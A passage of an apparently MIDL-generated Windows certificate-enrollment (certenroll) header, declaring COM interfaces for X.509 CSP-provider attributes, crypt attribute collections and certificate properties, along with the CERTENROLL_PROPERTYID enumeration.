#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeOSVersion_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeCspProvider_INTERFACE_DEFINED__
#define __IX509AttributeCspProvider_INTERFACE_DEFINED__

/* interface IX509AttributeCspProvider */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeCspProvider;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32b-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeCspProvider : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ X509KeySpec KeySpec,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strSignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProviderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Signature( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeCspProviderVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeCspProvider * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeCspProvider * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeCspProvider * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strSignature);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeCspProviderVtbl;

    interface IX509AttributeCspProvider
    {
        CONST_VTBL struct IX509AttributeCspProviderVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeCspProvider_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeCspProvider_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeCspProvider_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeCspProvider_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeCspProvider_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeCspProvider_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeCspProvider_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeCspProvider_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeCspProvider_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeCspProvider_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeCspProvider_InitializeEncode(This,KeySpec,strProviderName,Encoding,strSignature)	\
    ( (This)->lpVtbl -> InitializeEncode(This,KeySpec,strProviderName,Encoding,strSignature) ) 

#define IX509AttributeCspProvider_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeCspProvider_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define IX509AttributeCspProvider_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509AttributeCspProvider_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeCspProvider_INTERFACE_DEFINED__ */


#ifndef __ICryptAttribute_INTERFACE_DEFINED__
#define __ICryptAttribute_INTERFACE_DEFINED__

/* interface ICryptAttribute */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICryptAttribute;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32c-217d-11da-b2a4-000e7bbb2b09")
    ICryptAttribute : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromValues( 
            /* [in] */ __RPC__in_opt IX509Attributes *pAttributes) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Values( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Attributes **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICryptAttributeVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICryptAttribute * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICryptAttribute * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICryptAttribute * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICryptAttribute * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromObjectId )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromValues )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in_opt IX509Attributes *pAttributes);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ICryptAttribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Values )( 
            __RPC__in ICryptAttribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attributes **ppValue);
        
        END_INTERFACE
    } ICryptAttributeVtbl;

    interface ICryptAttribute
    {
        CONST_VTBL struct ICryptAttributeVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICryptAttribute_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICryptAttribute_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICryptAttribute_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICryptAttribute_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICryptAttribute_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICryptAttribute_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICryptAttribute_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICryptAttribute_InitializeFromObjectId(This,pObjectId)	\
    ( (This)->lpVtbl -> InitializeFromObjectId(This,pObjectId) ) 

#define ICryptAttribute_InitializeFromValues(This,pAttributes)	\
    ( (This)->lpVtbl -> InitializeFromValues(This,pAttributes) ) 

#define ICryptAttribute_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ICryptAttribute_get_Values(This,ppValue)	\
    ( (This)->lpVtbl -> get_Values(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICryptAttribute_INTERFACE_DEFINED__ */


#ifndef __ICryptAttributes_INTERFACE_DEFINED__
#define __ICryptAttributes_INTERFACE_DEFINED__

/* interface ICryptAttributes */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICryptAttributes;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32d-217d-11da-b2a4-000e7bbb2b09")
    ICryptAttributes : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttribute **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICryptAttribute *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt ICryptAttributes *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICryptAttributesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICryptAttributes * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICryptAttributes * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICryptAttributes * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICryptAttributes * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttribute **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICryptAttributes * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICryptAttributes * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt ICryptAttribute *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICryptAttributes * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt ICryptAttributes *pValue);
        
        END_INTERFACE
    } ICryptAttributesVtbl;

    interface ICryptAttributes
    {
        CONST_VTBL struct ICryptAttributesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICryptAttributes_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICryptAttributes_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICryptAttributes_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICryptAttributes_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICryptAttributes_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICryptAttributes_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICryptAttributes_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICryptAttributes_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICryptAttributes_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICryptAttributes_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICryptAttributes_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICryptAttributes_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICryptAttributes_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICryptAttributes_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#define ICryptAttributes_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICryptAttributes_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0048 */
/* [local] */ 

typedef 
enum CERTENROLL_PROPERTYID
    {
        XCN_PROPERTYID_NONE	= 0,
        XCN_CERT_KEY_PROV_HANDLE_PROP_ID	= 1,
        XCN_CERT_KEY_PROV_INFO_PROP_ID	= 2,
        XCN_CERT_SHA1_HASH_PROP_ID	= 3,
        XCN_CERT_MD5_HASH_PROP_ID	= 4,
        XCN_CERT_HASH_PROP_ID	= 3,
        XCN_CERT_KEY_CONTEXT_PROP_ID	= 5,
        XCN_CERT_KEY_SPEC_PROP_ID	= 6,
        XCN_CERT_IE30_RESERVED_PROP_ID	= 7,
        XCN_CERT_PUBKEY_HASH_RESERVED_PROP_ID	= 8,
        XCN_CERT_ENHKEY_USAGE_PROP_ID	= 9,
        XCN_CERT_CTL_USAGE_PROP_ID	= 9,
        XCN_CERT_NEXT_UPDATE_LOCATION_PROP_ID	= 10,
        XCN_CERT_FRIENDLY_NAME_PROP_ID	= 11,
        XCN_CERT_PVK_FILE_PROP_ID	= 12,
        XCN_CERT_DESCRIPTION_PROP_ID	= 13,
        XCN_CERT_ACCESS_STATE_PROP_ID	= 14,
        XCN_CERT_SIGNATURE_HASH_PROP_ID	= 15,
        XCN_CERT_SMART_CARD_DATA_PROP_ID	= 16,
        XCN_CERT_EFS_PROP_ID	= 17,
        XCN_CERT_FORTEZZA_DATA_PROP_ID	= 18,
        XCN_CERT_ARCHIVED_PROP_ID	= 19,
        XCN_CERT_KEY_IDENTIFIER_PROP_ID	= 20,
        XCN_CERT_AUTO_ENROLL_PROP_ID	= 21,
        XCN_CERT_PUBKEY_ALG_PARA_PROP_ID	= 22,
        XCN_CERT_CROSS_CERT_DIST_POINTS_PROP_ID	= 23,
        XCN_CERT_ISSUER_PUBLIC_KEY_MD5_HASH_PROP_ID	= 24,
        XCN_CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID	= 25,
        XCN_CERT_ENROLLMENT_PROP_ID	= 26,
        XCN_CERT_DATE_STAMP_PROP_ID	= 27,
        XCN_CERT_ISSUER_SERIAL_NUMBER_MD5_HASH_PROP_ID	= 28,
        XCN_CERT_SUBJECT_NAME_MD5_HASH_PROP_ID	= 29,
        XCN_CERT_EXTENDED_ERROR_INFO_PROP_ID	= 30,
        XCN_CERT_RENEWAL_PROP_ID	= 64,
        XCN_CERT_ARCHIVED_KEY_HASH_PROP_ID	= 65,
        XCN_CERT_AUTO_ENROLL_RETRY_PROP_ID	= 66,
        XCN_CERT_AIA_URL_RETRIEVED_PROP_ID	= 67,
        XCN_CERT_AUTHORITY_INFO_ACCESS_PROP_ID	= 68,
        XCN_CERT_BACKED_UP_PROP_ID	= 69,
        XCN_CERT_OCSP_RESPONSE_PROP_ID	= 70,
        XCN_CERT_REQUEST_ORIGINATOR_PROP_ID	= 71,
        XCN_CERT_SOURCE_LOCATION_PROP_ID	= 72,
        XCN_CERT_SOURCE_URL_PROP_ID	= 73,
        XCN_CERT_NEW_KEY_PROP_ID	= 74,
        XCN_CERT_OCSP_CACHE_PREFIX_PROP_ID	= 75,
        XCN_CERT_SMART_CARD_ROOT_INFO_PROP_ID	= 76,
        XCN_CERT_NO_AUTO_EXPIRE_CHECK_PROP_ID	= 77,
        XCN_CERT_NCRYPT_KEY_HANDLE_PROP_ID	= 78,
        XCN_CERT_HCRYPTPROV_OR_NCRYPT_KEY_HANDLE_PROP_ID	= 79,
        XCN_CERT_SUBJECT_INFO_ACCESS_PROP_ID	= 80,
        XCN_CERT_CA_OCSP_AUTHORITY_INFO_ACCESS_PROP_ID	= 81,
        XCN_CERT_CA_DISABLE_CRL_PROP_ID	= 82,
        XCN_CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID	= 83,
        XCN_CERT_ROOT_PROGRAM_NAME_CONSTRAINTS_PROP_ID	= 84,
        XCN_CERT_SUBJECT_OCSP_AUTHORITY_INFO_ACCESS_PROP_ID	= 85,
        XCN_CERT_SUBJECT_DISABLE_CRL_PROP_ID	= 86,
        XCN_CERT_CEP_PROP_ID	= 87,
        XCN_CERT_SIGN_HASH_CNG_ALG_PROP_ID	= 89,
        XCN_CERT_SCARD_PIN_ID_PROP_ID	= 90,
        XCN_CERT_SCARD_PIN_INFO_PROP_ID	= 91,
        XCN_CERT_SUBJECT_PUB_KEY_BIT_LENGTH_PROP_ID	= 92,
        XCN_CERT_PUB_KEY_CNG_ALG_BIT_LENGTH_PROP_ID	= 93,
        XCN_CERT_ISSUER_PUB_KEY_BIT_LENGTH_PROP_ID	= 94,
        XCN_CERT_ISSUER_CHAIN_SIGN_HASH_CNG_ALG_PROP_ID	= 95,
        XCN_CERT_ISSUER_CHAIN_PUB_KEY_CNG_ALG_BIT_LENGTH_PROP_ID	= 96,
        XCN_CERT_NO_EXPIRE_NOTIFICATION_PROP_ID	= 97,
        XCN_CERT_AUTH_ROOT_SHA256_HASH_PROP_ID	= 98,
        XCN_CERT_NCRYPT_KEY_HANDLE_TRANSFER_PROP_ID	= 99,
        XCN_CERT_HCRYPTPROV_TRANSFER_PROP_ID	= 100,
        XCN_CERT_SMART_CARD_READER_PROP_ID	= 101,
        XCN_CERT_SEND_AS_TRUSTED_ISSUER_PROP_ID	= 102,
        XCN_CERT_KEY_REPAIR_ATTEMPTED_PROP_ID	= 103,
        XCN_CERT_DISALLOWED_FILETIME_PROP_ID	= 104,
        XCN_CERT_ROOT_PROGRAM_CHAIN_POLICIES_PROP_ID	= 105,
        XCN_CERT_SMART_CARD_READER_NON_REMOVABLE_PROP_ID	= 106,
        XCN_CERT_SHA256_HASH_PROP_ID	= 107,
        XCN_CERT_SCEP_SERVER_CERTS_PROP_ID	= 108,
        XCN_CERT_SCEP_RA_SIGNATURE_CERT_PROP_ID	= 109,
        XCN_CERT_SCEP_RA_ENCRYPTION_CERT_PROP_ID	= 110,
        XCN_CERT_SCEP_CA_CERT_PROP_ID	= 111,
        XCN_CERT_SCEP_SIGNER_CERT_PROP_ID	= 112,
        XCN_CERT_SCEP_NONCE_PROP_ID	= 113,
        XCN_CERT_SCEP_ENCRYPT_HASH_CNG_ALG_PROP_ID	= 114,
        XCN_CERT_SCEP_FLAGS_PROP_ID	= 115,
        XCN_CERT_SCEP_GUID_PROP_ID	= 116,
        XCN_CERT_SERIALIZABLE_KEY_CONTEXT_PROP_ID	= 117,
        XCN_CERT_ISOLATED_KEY_PROP_ID	= 118,
        XCN_CERT_SERIAL_CHAIN_PROP_ID	= 119,
        XCN_CERT_KEY_CLASSIFICATION_PROP_ID	= 120,
        XCN_CERT_DISALLOWED_ENHKEY_USAGE_PROP_ID	= 122,
        XCN_CERT_NONCOMPLIANT_ROOT_URL_PROP_ID	= 123,
        XCN_CERT_PIN_SHA256_HASH_PROP_ID	= 124,
        XCN_CERT_CLR_DELETE_KEY_PROP_ID	= 125,
        XCN_CERT_NOT_BEFORE_FILETIME_PROP_ID	= 126,
        XCN_CERT_CERT_NOT_BEFORE_ENHKEY_USAGE_PROP_ID	= 127,
        XCN_CERT_FIRST_RESERVED_PROP_ID	= 128,
        XCN_CERT_LAST_RESERVED_PROP_ID	= 0x7fff,
        XCN_CERT_FIRST_USER_PROP_ID	= 0x8000,
        XCN_CERT_LAST_USER_PROP_ID	= 0xffff,
        XCN_CERT_STORE_LOCALIZED_NAME_PROP_ID	= 0x1000
    } 	CERTENROLL_PROPERTYID;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0048_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0048_v0_0_s_ifspec;

#ifndef __ICertProperty_INTERFACE_DEFINED__
#define __ICertProperty_INTERFACE_DEFINED__

/* interface ICertProperty */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertProperty;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32e-217d-11da-b2a4-000e7bbb2b09")
    ICertProperty : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PropertyId( 
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue) = 0;
        
